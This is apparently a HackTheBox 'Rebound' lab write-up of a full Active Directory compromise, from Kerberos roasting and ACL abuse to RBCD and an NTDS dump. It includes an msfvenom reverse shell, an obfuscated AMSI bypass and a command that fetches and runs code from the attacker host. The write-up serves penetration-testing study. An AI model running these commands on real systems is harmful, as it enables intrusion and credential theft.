HTB - Rebound

Description
Rebound is an Insane Windows machine featuring a tricky Active Directory environment. User enumeration via RID cycling reveals an AS-REP-roastable user, whose TGT is used to Kerberoast another user with a crackable password. Weak ACLs are abused to obtain access to a group with FullControl over an OU, performing a Descendant Object Takeover (DOT), followed by a ShadowCredentials attack on a user with winrm access. On the target system, cross-session relay is leveraged to obtain the NetNTLMv2 hash of a logged-in user, which, once cracked, leads to a gMSA password read. Finally, the gMSA account allows delegation, but without protocol transition. Resource-Based Constrained Delegation (RBCD) is used to impersonate the Domain Controller, enabling a DCSync attack, leading to fully elevated privileges.
Enumeration
IP Address: 10.10.11.231
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-port-scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
5985/tcp open wsman
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nmap -p53,88,135,139,389,445,5985 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-31 20:41:24Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-31T20:43:17+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m01s
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Host script results:
| smb2-time:
| date: 2024-10-31T20:41:42
|_ start_date: N/A
|_clock-skew: 7h00m01s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Summary
* Open ports: 53,88,135,139,445,5985
* UDP open ports: 53,88,123,389
* Services: DNS - RPC - SMB - KERBEROS - LDAP - NTP - winRM
* Important notes: DNS:dc01.rebound.htb - Domain: rebound.htb
Before I start, I'd prefer to update the /etc/hosts file to prevent further issues and to easily communicate with the box without typing the IP each time.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $sudo sh -c "echo '$ip dc01 dc01.rebound.htb rebound.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $tail -n1 /etc/hosts
10.10.11.231 dc01 dc01.rebound.htb rebound.htb
Service Enumeration
DNS Enumeration
It's always good to try a zone transfer, but it hardly ever succeeds.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $dig axfr @10.10.11.231 dc01.rebound.htb
; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> axfr @10.10.11.231 dc01.rebound.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
RPC & SMB Enumeration
I didn't get anything interesting from RPC, so SMB was next.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $rpcclient -U '%' $ip -c srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $rpcclient -U '%' $ip -c enumdomusers
result was NT_STATUS_ACCESS_DENIED
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $rpcclient -U '%' $ip -c enumdomgroups
result was NT_STATUS_ACCESS_DENIED
I can see that I have Read access on the Shared share, but unfortunately it's empty.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u '' -p '' --shares
SMB 10.10.11.231 445 DC01 [+] rebound.htb\:
SMB 10.10.11.231 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u 'guest' -p '' --shares
SMB 10.10.11.231 445 DC01 [+] rebound.htb\guest:
SMB 10.10.11.231 445 DC01 [*] Enumerated shares
SMB 10.10.11.231 445 DC01 Share Permissions Remark
SMB 10.10.11.231 445 DC01 ----- ----------- ------
SMB 10.10.11.231 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.231 445 DC01 C$ Default share
SMB 10.10.11.231 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.231 445 DC01 NETLOGON Logon server share
SMB 10.10.11.231 445 DC01 Shared READ
SMB 10.10.11.231 445 DC01 SYSVOL Logon server share
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $impacket-smbclient rebound.htb/'guest':''@dc01
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
# shares
ADMIN$
C$
IPC$
NETLOGON
Shared
SYSVOL
# use Shared
# ls
drw-rw-rw- 0 Fri Aug 25 17:46:36 2023 .
drw-rw-rw- 0 Fri Aug 25 17:46:36 2023 ..
When attempting RID brute-forcing with an anonymous login it failed, but it succeeded with the guest account.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u '' -p '' --rid-brute 10000
SMB 10.10.11.231 445 DC01 [+] rebound.htb\:
SMB 10.10.11.231 445 DC01 [-] Error connecting: LSAD SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u 'guest' -p '' --rid-brute 10000
SMB 10.10.11.231 445 DC01 [+] rebound.htb\guest:
SMB 10.10.11.231 445 DC01 498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.231 445 DC01 500: rebound\Administrator (SidTypeUser)
SMB 10.10.11.231 445 DC01 501: rebound\Guest (SidTypeUser)
SMB 10.10.11.231 445 DC01 502: rebound\krbtgt (SidTypeUser)
SMB 10.10.11.231 445 DC01 512: rebound\Domain Admins (SidTypeGroup)
SMB 10.10.11.231 445 DC01 513: rebound\Domain Users (SidTypeGroup)
SMB 10.10.11.231 445 DC01 514: rebound\Domain Guests (SidTypeGroup)
SMB 10.10.11.231 445 DC01 515: rebound\Domain Computers (SidTypeGroup)
SMB 10.10.11.231 445 DC01 516: rebound\Domain Controllers (SidTypeGroup)
SMB 10.10.11.231 445 DC01 517: rebound\Cert Publishers (SidTypeAlias)
SMB 10.10.11.231 445 DC01 518: rebound\Schema Admins (SidTypeGroup)
SMB 10.10.11.231 445 DC01 519: rebound\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.231 445 DC01 520: rebound\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.231 445 DC01 521: rebound\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.231 445 DC01 522: rebound\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.231 445 DC01 525: rebound\Protected Users (SidTypeGroup)
SMB 10.10.11.231 445 DC01 526: rebound\Key Admins (SidTypeGroup)
SMB 10.10.11.231 445 DC01 527: rebound\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.231 445 DC01 553: rebound\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.231 445 DC01 571: rebound\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.231 445 DC01 572: rebound\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.231 445 DC01 1000: rebound\DC01$ (SidTypeUser)
SMB 10.10.11.231 445 DC01 1101: rebound\DnsAdmins (SidTypeAlias)
SMB 10.10.11.231 445 DC01 1102: rebound\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.231 445 DC01 1951: rebound\ppaul (SidTypeUser)
SMB 10.10.11.231 445 DC01 2952: rebound\llune (SidTypeUser)
SMB 10.10.11.231 445 DC01 3382: rebound\fflock (SidTypeUser)
SMB 10.10.11.231 445 DC01 5277: rebound\jjones (SidTypeUser)
SMB 10.10.11.231 445 DC01 5569: rebound\mmalone (SidTypeUser)
SMB 10.10.11.231 445 DC01 5680: rebound\nnoon (SidTypeUser)
SMB 10.10.11.231 445 DC01 7681: rebound\ldap_monitor (SidTypeUser)
SMB 10.10.11.231 445 DC01 7682: rebound\oorend (SidTypeUser)
SMB 10.10.11.231 445 DC01 7683: rebound\ServiceMgmt (SidTypeGroup)
SMB 10.10.11.231 445 DC01 7684: rebound\winrm_svc (SidTypeUser)
SMB 10.10.11.231 445 DC01 7685: rebound\batch_runner (SidTypeUser)
SMB 10.10.11.231 445 DC01 7686: rebound\tbrady (SidTypeUser)
SMB 10.10.11.231 445 DC01 7687: rebound\delegator$ (SidTypeUser)
I added the users I found to a wordlist to use later.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $cat wordlists/users.list
ppaul
llune
fflock
jjones
mmalone
nnoon
ldap_monitor
oorend
ServiceMgmt
winrm_svc
batch_runner
tbrady
delegator$
LDAP & Kerberos Enumeration
I tried to query LDAP anonymously but got nothing from it.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $ldapsearch -H ldap://10.10.11.231 -x -s sub '*' -b "DC=rebound,DC=htb"
# LDAPv3
# base <DC=rebound,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: *
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090ACD, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
The last option now is Kerberos. With my usernames list, I can try two possible attacks, one common and one new to many people.
ASREP-Roasting Attack
Kerberoasting via an AS-REP-roastable account
nxc ldap dc01 -u wordlists/users.list -p '' --asreproast asrep.hashes

Unluckily, cracking the hash failed, which made me move to the next possible attack.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt
..snip..
Status...........: Exhausted
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$jjones@REBOUND.HTB:812fbf1df8bffa65dd...2a6157
To perform this attack, we need the latest version of Impacket.
mkdir impacket && cd impacket
python3 -m venv . && source ./bin/activate
pip3 install impacket
This is the option we need: -no-preauth, which lets GetUserSPNs.py request service tickets for the users in the list through the AS-REP-roastable account jjones, without needing its password.
Foothold
I will try to get some hashes and, if it succeeds, output them to a file.
python3 impacket/bin/GetUserSPNs.py rebound.htb/ -usersfile wordlists/users.list -request -no-preauth jjones -dc-ip dc01.rebound.htb
python3 impacket/bin/GetUserSPNs.py rebound.htb/ -usersfile wordlists/users.list -request -no-preauth jjones -dc-ip dc01.rebound.htb -output kerberos.hashes

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $hashcat -m 13100 kerberos.hashes /usr/share/wordlists/rockyou.txt
..snip..
$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$8ebcdf0e97d1de0fd18f1bd980841c97$..snip..:1GR8t@$$4u
Session..........: hashcat
Status...........: Cracked
Let's check the validity of these credentials. Authentication to SMB worked, but LDAP failed.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u ldap_monitor -p '1GR8t@$$4u'
SMB 10.10.11.231 445 DC01 [+] rebound.htb\ldap_monitor:1GR8t@$$4u
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound/ldapdomaindump]
└──╼ $nxc ldap dc01 -u ldap_monitor -p '1GR8t@$$4u'
LDAPS 10.10.11.231 636 DC01 [-] rebound.htb\ldap_monitor:1GR8t@$$4u
LDAPS 10.10.11.231 636 DC01 [-] LDAPS channel binding might be enabled, this is only supported with kerberos authentication. Try using '-k'.
It looks like Kerberos authentication is enforced, so I will try again with -k.
I faced a Kerberos clock skew problem that the common solutions didn't fix, so I wrote this loop to sync the clock with the DC every second. "Not the best way, but it worked :)"
while true; do ntpdate 10.10.11.231; sleep 1; done
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc ldap dc01 -u ldap_monitor -p '1GR8t@$$4u' -k
LDAPS dc01 636 DC01 [+] rebound.htb\ldap_monitor
With valid domain credentials, I can move on to the domain enumeration process: credentialed enumeration against LDAP and SMB, and a password spray. I will start with bloodhound.py.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $bloodhound-python -u 'ldap_monitor@rebound.htb' -p '1GR8t@$$4u' -ns 10.10.11.231 -d rebound.htb --zip -k
INFO: Found AD domain: rebound.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 16 users
INFO: Found 53 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.rebound.htb
INFO: Done in 00M 42S
INFO: Compressing output into 20241031191948_bloodhound.zip
Lateral Movement
I found that two users shared the same password, and the third hit was a group, not a user.

Looking at permissions on the shares and the files inside with the spider_plus module gave nothing interesting. I will enumerate the domain manually with PowerView.py.
(powerview.py) ┌─[kali@parrot]─[/opt/powerview.py]
└──╼ $python3 powerview.py rebound.htb/ldap_monitor:'1GR8t@$$4u'@10.10.11.231 -k
(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainUser -Identity oorend -Properties name,ObjectSid
name : oorend
objectSid : S-1-5-21-4078382237-1492182817-2568127209-7682
(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainObjectAcl -Identity * -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7682
[2024-10-31 19:46:49] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7683
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : Self
AccessMask : 0x8
InheritanceType : None
SecurityIdentifier : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)
User oorend has AddSelf on the ServiceMgmt group, so I was curious to see the ACLs of this group. I found that it has FullControl over the Organizational Unit (OU) Service Users.
(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainObjectAcl -Identity * -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7683
[2024-10-31 19:48:50] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : None
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : FullControl
AccessMask : 0xf01ff
InheritanceType : None
SecurityIdentifier : ServiceMgmt (S-1-5-21-4078382237-1492182817-2568127209-7683)
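To make ACL findings like the two above easier to audit, here is an added Python example (not the page's or PowerView's code) that decodes the AccessMask values Get-DomainObjectAcl prints into named rights and flags ACEs that grant modify rights; the sample output it parses is constructed from the two ACEs shown above.

```python
"""Decode AccessMask values from Get-DomainObjectAcl output into named rights
and flag ACEs that let a trustee modify an object. Added example, not the page's
or PowerView's code; SAMPLE is constructed from the two ACEs reported above."""

# Access-right bits from ADS_RIGHTS_ENUM; keys are disjoint, so sum() == OR.
ADS_RIGHTS = {
    0x1: "CreateChild", 0x2: "DeleteChild", 0x4: "ListChildren",
    0x8: "Self",             # validated write, e.g. add yourself to a group's member attribute
    0x10: "ReadProperty", 0x20: "WriteProperty", 0x40: "DeleteTree",
    0x80: "ListObject",
    0x100: "ExtendedRight",  # control-access rights such as User-Force-Change-Password
    0x10000: "Delete", 0x20000: "ReadControl", 0x40000: "WriteDacl",
    0x80000: "WriteOwner", 0x100000: "Synchronize",
    0x1000000: "AccessSystemSecurity",
    0x10000000: "GenericAll", 0x20000000: "GenericExecute",
    0x40000000: "GenericWrite", 0x80000000: "GenericRead",
}
KNOWN_BITS = sum(ADS_RIGHTS)
FULL_CONTROL = 0xF01FF  # all DS rights plus Delete/ReadControl/WriteDacl/WriteOwner
# Rights that change an object, its attributes or its security descriptor.
MODIFY_RIGHTS = {"CreateChild", "DeleteChild", "Self", "WriteProperty", "DeleteTree",
                 "ExtendedRight", "Delete", "WriteDacl", "WriteOwner", "GenericAll", "GenericWrite"}


def decode_mask(mask: int) -> list[str]:
    """Named rights set in an access mask, lowest bit first."""
    names = [name for bit, name in sorted(ADS_RIGHTS.items()) if mask & bit]
    if mask & ~KNOWN_BITS:
        names.append(f"Unknown(0x{mask & ~KNOWN_BITS:x})")
    return names


def summarize(mask: int) -> str:
    """Collapse GenericAll or the full 0xF01FF set to FullControl, as PowerView does."""
    if mask & 0x10000000 or mask & FULL_CONTROL == FULL_CONTROL:
        return "FullControl"
    return ",".join(decode_mask(mask))


def audit_aces(text: str) -> list[dict]:
    """Parse PowerView-style 'Key : Value' blocks (blank-line separated) into findings."""
    findings = []
    for block in text.strip().split("\n\n"):
        ace = {k.strip(): v.strip() for k, _, v in (l.partition(" : ") for l in block.splitlines())}
        mask = int(ace["AccessMask"], 16)
        rights = decode_mask(mask)
        findings.append({"trustee": ace["SecurityIdentifier"].split(" (")[0],
                         "object": ace["ObjectDN"], "rights": rights, "summary": summarize(mask),
                         "modify": any(r in MODIFY_RIGHTS for r in rights)})
    return findings


# Constructed sample in Get-DomainObjectAcl's output format, reduced to the fields used.
SAMPLE = """\
ObjectDN : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
AccessMask : 0x8
SecurityIdentifier : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)

ObjectDN : OU=Service Users,DC=rebound,DC=htb
AccessMask : 0xf01ff
SecurityIdentifier : ServiceMgmt (S-1-5-21-4078382237-1492182817-2568127209-7683)
"""
```

Both sample ACEs come out flagged as modify rights: Self on a group is the AddSelf primitive, and 0xf01ff on the OU is FullControl that inherits to every object under it.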
(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainObjectAcl -SearchBase "OU=Service Users,DC=rebound,DC=htb" -Select ObjectDN
..snip..
CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
CN=batch_runner,OU=Service Users,DC=rebound,DC=htb
..snip..
When enumerating the domain objects under this OU, I found that it contains the winrm_svc account, which is a member of Remote Management Users, so it can access the machine via WinRM.

The exploitation path is: abuse AddSelf => abuse FullControl inheritance => ChangePassword of winrm_svc or Shadow Credentials.
python3 powerview.py rebound.htb/oorend:'1GR8t@$$4u'@10.10.11.231 -k
Add-DomainGroupMember -Identity "ServiceMgmt" -Members oorend
Add-DomainObjectAcl -TargetIdentity "OU=Service Users,DC=rebound,DC=htb" -PrincipalIdentity oorend -Rights fullcontrol
or
./bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --dc-ip 10.10.11.231 -k --host dc01.rebound.htb add genericAll "OU=Service Users,DC=rebound,DC=htb" oorend

Set-DomainUserPassword -Identity winrm_svc -AccountPassword 'NewPass@w0rd123!!'
Or
net rpc password winrm_svc 'NewPass@w0rd123!!' -U rebound.htb/oorend%'1GR8t@$$4u' -S 10.10.11.231

Access the machine
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $evil-winrm -i dc01 -u winrm_svc -p 'NewPass@w0rd123!!'
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>
User Flag: 46bad1cb1f3b5f3da2945c6f38c92c7c
Privilege Escalation
The password and ACLs get reset periodically, so I must hurry and establish a persistent shell.
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.3 lport=443 -f psh -o shell.ps1
sudo msfconsole -x 'use exploit/multi/handler;set lhost 10.10.16.3;set lport 443;set payload windows/x64/meterpreter/reverse_tcp; run'
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)
iex(iwr -UseBasicParsing 10.10.16.3/shell.ps1)
After getting a shell in Metasploit, I wanted to query logged-on users, but it didn't give me anything. However, when using logon type 9 (network logon), it shows that the tbrady user is logged on.

Looking into BloodHound for the privileges of that user, I found that it can read a gMSA account hash.

To get this account, I can use a cross-session attack to steal its NTLMv2 hash and try to crack it.
I used this repo to perform the attack: antonioCoco/RemotePotato0: Windows Privilege Escalation from User to Domain Admin.

Following this repo's instructions, I get these two commands.
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999 &
.\RemotePotato0.exe -m 2 -s 1 -x 10.10.16.3 -p 9999

Trying to crack the hash using hashcat, and it succeeded :))
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $hashcat -m 5600 hashes/ntlmv2.hash /usr/share/wordlists/rockyou.txt
TBRADY::rebound:0a5c6a4a69ec25ec:45e00b50ae6b1770ce5783b45df11a7b:..snip..:543BOMBOMBUNmanda
Session..........: hashcat
Status...........: Cracked
Now I can read the gMSA hash.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc ldap dc01 -u TBRADY -p '543BOMBOMBUNmanda' --gmsa -k
LDAPS dc01 636 DC01 [+] rebound.htb\TBRADY:543BOMBOMBUNmanda
LDAPS dc01 636 DC01 [*] Getting GMSA Passwords
LDAPS dc01 636 DC01 Account: delegator$ NTLM: ed8d95b20400dce3355419f277d3421c
I want to enumerate the delegation configured on the delegator$ account.
(impacket) ┌─[kali@parrot]─[/opt/impacket/bin]
└──╼ $findDelegation.py rebound.htb/'delegator$'@dc01 -hashes :ed8d95b20400dce3355419f277d3421c -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName AccountType DelegationType DelegationRightsTo SPN Exists
----------- ----------------------------------- -------------- --------------------- ----------
delegator$ ms-DS-Group-Managed-Service-Account Constrained http/dc01.rebound.htb No
From here, I stopped and couldn't go any further. The constrained delegation here is for the http service, and I couldn't request a ticket impersonating the Administrator or DC01, so the following attack path is very complicated and I will try to simplify it as much as I can.
* Since I already have control of the delegator$ account, I can perform RBCD and add ldap_monitor to the msDS-AllowedToActOnBehalfOfOtherIdentity list, so ldap_monitor can impersonate any user in the domain.
* Request a Service Ticket as ldap_monitor impersonating DC01, so the ticket will have the forwardable flag.
* Use this ticket to request another ticket instead of S4U2Self and impersonate the DC.
rbcd.py 'rebound.htb/delegator$' -hashes :ed8d95b20400dce3355419f277d3421c -k -delegate-from ldap_monitor -delegate-to 'delegator$' -action write -dc-ip dc01.rebound.htb -use-ldaps
findDelegation.py 'rebound.htb/delegator$' -dc-ip 10.10.11.231 -k -hashes :ed8d95b20400dce3355419f277d3421c
getST.py 'rebound.htb/ldap_monitor:1GR8t@$$4u' -spn browser/dc01.rebound.htb -impersonate 'DC01$'
getST.py -spn http/dc01.rebound.htb -impersonate 'DC01$' 'rebound.htb/delegator$' -hashes :ed8d95b20400dce3355419f277d3421c -additional-ticket 'DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache'
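The following added Python example (not Impacket's or the page's code) models the KDC's S4U2Self/S4U2Proxy checks for the accounts findDelegation reported, showing why delegator$ alone cannot obtain a ticket for DC01$ to http/dc01.rebound.htb and why the RBCD entry for ldap_monitor makes the chain above work; the account settings are constructed, and the forwardable rule is a simplification of the KDC's behaviour.

```python
"""Model of the KDC checks behind the ticket chain above: why delegator$ alone
cannot impersonate DC01$ to http/dc01, and why the RBCD detour through
ldap_monitor can. Added example, not Impacket's or the page's code; the accounts
are constructed to match what findDelegation reported."""
from __future__ import annotations
from collections import namedtuple
from dataclasses import dataclass, field

TRUSTED_FOR_DELEGATION = 0x80000            # userAccountControl: unconstrained
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # userAccountControl: protocol transition
Ticket = namedtuple("Ticket", "client service forwardable")  # impersonated principal, SPN, FORWARDABLE flag

@dataclass
class Account:
    sam: str
    spns: list[str]                                                    # a user without an SPN is addressed by its name
    uac: int = 0
    allowed_to_delegate_to: list[str] = field(default_factory=list)    # msDS-AllowedToDelegateTo
    allowed_to_act_on_behalf: list[str] = field(default_factory=list)  # msDS-AllowedToActOnBehalfOfOtherIdentity

def delegation_types(a: Account) -> list[str]:
    """The DelegationType rows findDelegation prints for an account."""
    types = []
    if a.uac & TRUSTED_FOR_DELEGATION:
        types.append("Unconstrained")
    if a.allowed_to_delegate_to:
        types.append("Constrained w/ Protocol Transition"
                     if a.uac & TRUSTED_TO_AUTH_FOR_DELEGATION else "Constrained")
    if a.allowed_to_act_on_behalf:
        types.append("Resource-Based Constrained")
    return types

def s4u2self(svc: Account, user: str) -> Ticket:
    """Simplified KDC rule: forwardable unless svc has constrained delegation without protocol transition."""
    fwd = bool(svc.uac & TRUSTED_TO_AUTH_FOR_DELEGATION) or not svc.allowed_to_delegate_to
    return Ticket(user, svc.spns[0], fwd)

def s4u2proxy(svc: Account, evidence: Ticket, target: Account, spn: str) -> Ticket | None:
    """Classic constrained delegation needs spn in msDS-AllowedToDelegateTo AND a
    forwardable evidence ticket; RBCD only needs svc listed on the target account."""
    if evidence.service not in svc.spns:
        return None  # the evidence ticket must be addressed to svc itself
    classic = spn in svc.allowed_to_delegate_to and evidence.forwardable
    rbcd = svc.sam in target.allowed_to_act_on_behalf
    return Ticket(evidence.client, spn, True) if classic or rbcd else None

def build_domain(rbcd_written: bool) -> dict[str, Account]:
    """Constructed accounts; rbcd_written mirrors the rbcd.py write step above."""
    delegator = Account("delegator$", ["browser/dc01.rebound.htb"],
                        allowed_to_delegate_to=["http/dc01.rebound.htb"])
    if rbcd_written:
        delegator.allowed_to_act_on_behalf.append("ldap_monitor")
    return {"delegator$": delegator, "ldap_monitor": Account("ldap_monitor", ["ldap_monitor"]),
            "DC01$": Account("DC01$", ["http/dc01.rebound.htb"])}

def direct_attempt(user: str = "DC01$") -> Ticket | None:
    """delegator$ alone: its S4U2Self ticket is not forwardable, so S4U2Proxy is refused."""
    d = build_domain(False)
    return s4u2proxy(d["delegator$"], s4u2self(d["delegator$"], user), d["DC01$"], "http/dc01.rebound.htb")

def chained_attempt(user: str = "DC01$") -> Ticket | None:
    """RBCD gives ldap_monitor a forwardable ticket for DC01$ to delegator$'s SPN, which delegator$ forwards on."""
    d = build_domain(True)
    ev = s4u2proxy(d["ldap_monitor"], s4u2self(d["ldap_monitor"], user), d["delegator$"], "browser/dc01.rebound.htb")
    return s4u2proxy(d["delegator$"], ev, d["DC01$"], "http/dc01.rebound.htb") if ev else None
```

From a defensive view the model also shows the control point: the chain only works once msDS-AllowedToActOnBehalfOfOtherIdentity on delegator$ is written, so alerting on changes to that attribute (and on gMSA password reads) catches this path early.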
Dumping ntds.dit secrets
(impacket) ┌─[✗]─[kali@parrot]─[/opt/impacket/bin]
└──╼ $nxc smb dc01 -k --use-kcache --ntds --user administrator
SMB dc01 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB dc01 445 DC01 [+] rebound.htb\DC01$ from ccache
SMB dc01 445 DC01 [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB dc01 445 DC01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB dc01 445 DC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
Access the machine as an administrator
(impacket) ┌─[kali@parrot]─[/opt/impacket/bin]
└──╼ $evil-winrm -i dc01 -u administrator -H 176be138594933bb67db3b2572fc91b8
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
56bf9cc0fa746883f65axxxxxxxxxxxxx
Root Flag: 56bf9cc0fa746883f65ab822f3ceb779